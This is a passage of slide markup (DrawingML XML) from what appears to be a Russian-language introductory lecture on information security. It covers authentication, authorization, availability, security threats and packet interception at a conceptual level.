                <a:tab algn="l" pos="3139920"/>
                <a:tab algn="l" pos="3589200"/>
                <a:tab algn="l" pos="4038480"/>
                <a:tab algn="l" pos="4487760"/>
                <a:tab algn="l" pos="4937040"/>
                <a:tab algn="l" pos="5386320"/>
                <a:tab algn="l" pos="5835600"/>
                <a:tab algn="l" pos="6284880"/>
                <a:tab algn="l" pos="6734160"/>
                <a:tab algn="l" pos="7183440"/>
                <a:tab algn="l" pos="7632720"/>
                <a:tab algn="l" pos="8082000"/>
                <a:tab algn="l" pos="8531280"/>
                <a:tab algn="l" pos="8980560"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ce181e"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проверка, что вы – это действительно вы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="339840"/>
                <a:tab algn="l" pos="444600"/>
                <a:tab algn="l" pos="893880"/>
                <a:tab algn="l" pos="1343160"/>
                <a:tab algn="l" pos="1792440"/>
                <a:tab algn="l" pos="2241720"/>
                <a:tab algn="l" pos="2690640"/>
                <a:tab algn="l" pos="3139920"/>
                <a:tab algn="l" pos="3589200"/>
                <a:tab algn="l" pos="4038480"/>
                <a:tab algn="l" pos="4487760"/>
                <a:tab algn="l" pos="4937040"/>
                <a:tab algn="l" pos="5386320"/>
                <a:tab algn="l" pos="5835600"/>
                <a:tab algn="l" pos="6284880"/>
                <a:tab algn="l" pos="6734160"/>
                <a:tab algn="l" pos="7183440"/>
                <a:tab algn="l" pos="7632720"/>
                <a:tab algn="l" pos="8082000"/>
                <a:tab algn="l" pos="8531280"/>
                <a:tab algn="l" pos="8980560"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Логин/пароль</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="339840"/>
                <a:tab algn="l" pos="444600"/>
                <a:tab algn="l" pos="893880"/>
                <a:tab algn="l" pos="1343160"/>
                <a:tab algn="l" pos="1792440"/>
                <a:tab algn="l" pos="2241720"/>
                <a:tab algn="l" pos="2690640"/>
                <a:tab algn="l" pos="3139920"/>
                <a:tab algn="l" pos="3589200"/>
                <a:tab algn="l" pos="4038480"/>
                <a:tab algn="l" pos="4487760"/>
                <a:tab algn="l" pos="4937040"/>
                <a:tab algn="l" pos="5386320"/>
                <a:tab algn="l" pos="5835600"/>
                <a:tab algn="l" pos="6284880"/>
                <a:tab algn="l" pos="6734160"/>
                <a:tab algn="l" pos="7183440"/>
                <a:tab algn="l" pos="7632720"/>
                <a:tab algn="l" pos="8082000"/>
                <a:tab algn="l" pos="8531280"/>
                <a:tab algn="l" pos="8980560"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сертификаты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="339840"/>
                <a:tab algn="l" pos="444600"/>
                <a:tab algn="l" pos="893880"/>
                <a:tab algn="l" pos="1343160"/>
                <a:tab algn="l" pos="1792440"/>
                <a:tab algn="l" pos="2241720"/>
                <a:tab algn="l" pos="2690640"/>
                <a:tab algn="l" pos="3139920"/>
                <a:tab algn="l" pos="3589200"/>
                <a:tab algn="l" pos="4038480"/>
                <a:tab algn="l" pos="4487760"/>
                <a:tab algn="l" pos="4937040"/>
                <a:tab algn="l" pos="5386320"/>
                <a:tab algn="l" pos="5835600"/>
                <a:tab algn="l" pos="6284880"/>
                <a:tab algn="l" pos="6734160"/>
                <a:tab algn="l" pos="7183440"/>
                <a:tab algn="l" pos="7632720"/>
                <a:tab algn="l" pos="8082000"/>
                <a:tab algn="l" pos="8531280"/>
                <a:tab algn="l" pos="8980560"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Коды через смс</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673520" y="1719360"/>
            <a:ext cx="4014360" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ce181e"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Авторизация</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="0" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проверка наличия у вас разрешений на доступ к ресурсу</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Access control lists (ACL) в файловых системах, Active Directory</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Системы ролей пользователей </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7"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Доступность</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8456040" cy="4874760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Доступность</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– злоумышленник не должен помешать передаче данных</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Text Box 3"/>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en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{3AE25584-B5EA-4D08-A362-0C60A9A62458}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="3962520"/>
            <a:ext cx="2664720" cy="1521720"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cccc00"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сеть</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="331" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646280" y="4114800"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599160" y="4114800"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="4714920"/>
            <a:ext cx="785160" cy="7200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 785160"/>
              <a:gd name="textAreaRight" fmla="*/ 787320 w 785160"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 7200"/>
              <a:gd name="textAreaBottom" fmla="*/ 9360 h 7200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="496" h="6">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="496" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="lg" type="stealth" w="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="-35640" bIns="-35640" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262400" y="2666880"/>
            <a:ext cx="688320" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Text Box 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040720" y="2743200"/>
            <a:ext cx="2849760" cy="825480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>забрасывает серверы</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>пакетами</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> взламывает</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>и нарушает их работу</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3479760" y="3733920"/>
            <a:ext cx="785160" cy="1002600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 785160"/>
              <a:gd name="textAreaRight" fmla="*/ 787320 w 785160"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1002600"/>
              <a:gd name="textAreaBottom" fmla="*/ 1004760 h 1002600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="496" h="633">
                <a:moveTo>
                  <a:pt x="0" y="633"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="599"/>
                  <a:pt x="186" y="536"/>
                  <a:pt x="269" y="431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352" y="326"/>
                  <a:pt x="449" y="90"/>
                  <a:pt x="496" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd len="lg" type="stealth" w="lg"/>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337" name="Line 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352680" y="4419360"/>
            <a:ext cx="1440" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="76320">
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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8" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316080" y="466560"/>
            <a:ext cx="6779520" cy="2317320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Угрозы</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4800"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>безопасности</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Text Box 2"/>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B574F92E-BFC8-410E-8EB5-4AA549A08BF1}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214720" y="3286080"/>
            <a:ext cx="4784040" cy="318888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1"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Перехват пакетов</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1428840"/>
            <a:ext cx="8227440" cy="5427000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
